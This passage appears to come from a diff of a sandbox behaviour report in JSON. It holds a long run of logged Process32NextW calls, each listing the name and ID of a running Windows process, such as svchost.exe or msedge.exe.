"value": "3928" + } + ], + "repeated": 0, + "id": 1353 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "3940" + } + ], + "repeated": 0, + "id": 1354 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4056" + } + ], + "repeated": 0, + "id": 1355 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ctfmon.exe" + }, + { + "name": "ProcessId", + "value": "1564" + } + ], + "repeated": 0, + "id": 1356 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4132" + } + ], + "repeated": 0, + "id": 1357 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "explorer.exe" + }, + { + "name": "ProcessId", + "value": "4248" + } + ], + "repeated": 0, + "id": 1358 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4372" + } + ], + "repeated": 0, + "id": 1359 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4432" + } + ], + "repeated": 0, + "id": 1360 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4812" + } + ], + "repeated": 0, + "id": 1361 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4908" + } + ], + "repeated": 0, + "id": 1362 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4936" + } + ], + "repeated": 0, + "id": 1363 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "StartMenuExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "3508" + } + ], + "repeated": 0, + "id": 1364 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4712" + } + ], + "repeated": 0, + "id": 1365 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5144" + } + ], + "repeated": 0, + "id": 1366 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchApp.exe" + }, + { + "name": "ProcessId", + "value": "5324" + } + ], + "repeated": 0, + "id": 1367 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "5444" + } + ], + "repeated": 0, + "id": 1368 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchIndexer.exe" + }, + { + "name": "ProcessId", + "value": "5456" + } + ], + "repeated": 0, + "id": 1369 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5716" + } + ], + "repeated": 0, + "id": 1370 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "5876" + } + ], + "repeated": 0, + "id": 1371 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "smartscreen.exe" + }, + { + "name": "ProcessId", + "value": "6068" + } + ], + "repeated": 0, + "id": 1372 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthSystray.exe" + }, + { + "name": "ProcessId", + "value": "6108" + } + ], + "repeated": 0, + "id": 1373 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SecurityHealthService.exe" + }, + { + "name": "ProcessId", + "value": "5216" + } + ], + "repeated": 0, + "id": 1374 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6468" + } + ], + "repeated": 0, + "id": 1375 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7000" + } + ], + "repeated": 0, + "id": 1376 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ApplicationFrameHost.exe" + }, + { + "name": "ProcessId", + "value": "7132" + } + ], + "repeated": 0, + "id": 1377 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6384" + } + ], + "repeated": 0, + "id": 1378 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7592" + } + ], + "repeated": 0, + "id": 1379 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7620" + } + ], + "repeated": 0, + "id": 1380 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "audiodg.exe" + }, + { + "name": "ProcessId", + "value": "7760" + } + ], + "repeated": 0, + "id": 1381 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "ShellExperienceHost.exe" + }, + { + "name": "ProcessId", + "value": "7964" + } + ], + "repeated": 0, + "id": 1382 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8048" + } + ], + "repeated": 0, + "id": 1383 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TextInputHost.exe" + }, + { + "name": "ProcessId", + "value": "7716" + } + ], + "repeated": 0, + "id": 1384 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "812" + } + ], + "repeated": 0, + "id": 1385 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WinStore.App.exe" + }, + { + "name": "ProcessId", + "value": "7444" + } + ], + "repeated": 0, + "id": 1386 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "4772" + } + ], + "repeated": 0, + "id": 1387 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7408" + } + ], + "repeated": 0, + "id": 1388 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "7736" + } + ], + "repeated": 0, + "id": 1389 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6580" + } + ], + "repeated": 0, + "id": 1390 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6536" + } + ], + "repeated": 0, + "id": 1391 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SearchProtocolHost.exe" + }, + { + "name": "ProcessId", + "value": "2148" + } + ], + "repeated": 0, + "id": 1392 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "1592" + } + ], + "repeated": 0, + "id": 1393 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6316" + } + ], + "repeated": 0, + "id": 1394 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SgrmBroker.exe" + }, + { + "name": "ProcessId", + "value": "3540" + } + ], + "repeated": 0, + "id": 1395 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4160" + } + ], + "repeated": 0, + "id": 1396 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "6388" + } + ], + "repeated": 0, + "id": 1397 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7140" + } + ], + "repeated": 0, + "id": 1398 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msiexec.exe" + }, + { + "name": "ProcessId", + "value": "6840" + } + ], + "repeated": 0, + "id": 1399 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7556" + } + ], + "repeated": 0, + "id": 1400 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "364" + } + ], + "repeated": 0, + "id": 1401 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "7904" + } + ], + "repeated": 0, + "id": 1402 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1888" + } + ], + "repeated": 0, + "id": 1403 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3788" + } + ], + "repeated": 0, + "id": 1404 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "1876" + } + ], + "repeated": 0, + "id": 1405 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pyw.exe" + }, + { + "name": "ProcessId", + "value": "3876" + } + ], + "repeated": 0, + "id": 1406 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "pythonw.exe" + }, + { + "name": "ProcessId", + "value": "4696" + } + ], + "repeated": 0, + "id": 1407 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "6080" + } + ], + "repeated": 0, + "id": 1408 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "msedge.exe" + }, + { + "name": "ProcessId", + "value": "3492" + } + ], + "repeated": 0, + "id": 1409 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "taskhostw.exe" + }, + { + "name": "ProcessId", + "value": "7488" + } + ], + "repeated": 0, + "id": 1410 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6344" + } + ], + "repeated": 0, + "id": 1411 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TrustedInstaller.exe" + }, + { + "name": "ProcessId", + "value": "4624" + } + ], + "repeated": 0, + "id": 1412 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "4512" + } + ], + "repeated": 0, + "id": 1413 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "TiWorker.exe" + }, + { + "name": "ProcessId", + "value": "6300" + } + ], + "repeated": 0, + "id": 1414 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "4768" + } + ], + "repeated": 0, + "id": 1415 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "8128" + } + ], + "repeated": 0, + "id": 1416 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "6864" + } + ], + "repeated": 0, + "id": 1417 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SkypeApp.exe" + }, + { + "name": "ProcessId", + "value": "2636" + } + ], + "repeated": 0, + "id": 1418 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "WMIADAP.exe" + }, + { + "name": "ProcessId", + "value": "396" + } + ], + "repeated": 0, + "id": 1419 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "conhost.exe" + }, + { + "name": "ProcessId", + "value": "8172" + } + ], + "repeated": 0, + "id": 1420 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "dllhost.exe" + }, + { + "name": "ProcessId", + "value": "5748" + } + ], + "repeated": 0, + "id": 1421 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "MoUsoCoreWorker.exe" + }, + { + "name": "ProcessId", + "value": "8112" + } + ], + "repeated": 0, + "id": 1422 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "sppsvc.exe" + }, + { + "name": "ProcessId", + "value": "616" + } + ], + "repeated": 0, + "id": 1423 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "7472" + } + ], + "repeated": 0, + "id": 1424 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "SppExtComObj.Exe" + }, + { + "name": "ProcessId", + "value": "368" + } + ], + "repeated": 0, + "id": 1425 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "CompatTelRunner.exe" + }, + { + "name": "ProcessId", + "value": "6292" + } + ], + "repeated": 0, + "id": 1426 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "backgroundTaskHost.exe" + }, + { + "name": "ProcessId", + "value": "8760" + } + ], + "repeated": 0, + "id": 1427 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8836" + } + ], + "repeated": 0, + "id": 1428 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "3056" + } + ], + "repeated": 0, + "id": 1429 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8412" + } + ], + "repeated": 0, + "id": 1430 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8936" + } + ], + "repeated": 0, + "id": 1431 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "RuntimeBroker.exe" + }, + { + "name": "ProcessId", + "value": "8608" + } + ], + "repeated": 0, + "id": 1432 + }, + { + "timestamp": "2025-03-07 22:33:51,235", + "thread_id": "9440", + "caller": "0x03ce3688", + "parentcaller": "0x03ce461b", + "category": "process", + "api": "Process32NextW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "ProcessName", + "value": "svchost.exe" + }, + { + "name": "ProcessId", + "value": "8292" + } + ], + "repeated": 0, + "id": 1433 + }, + { 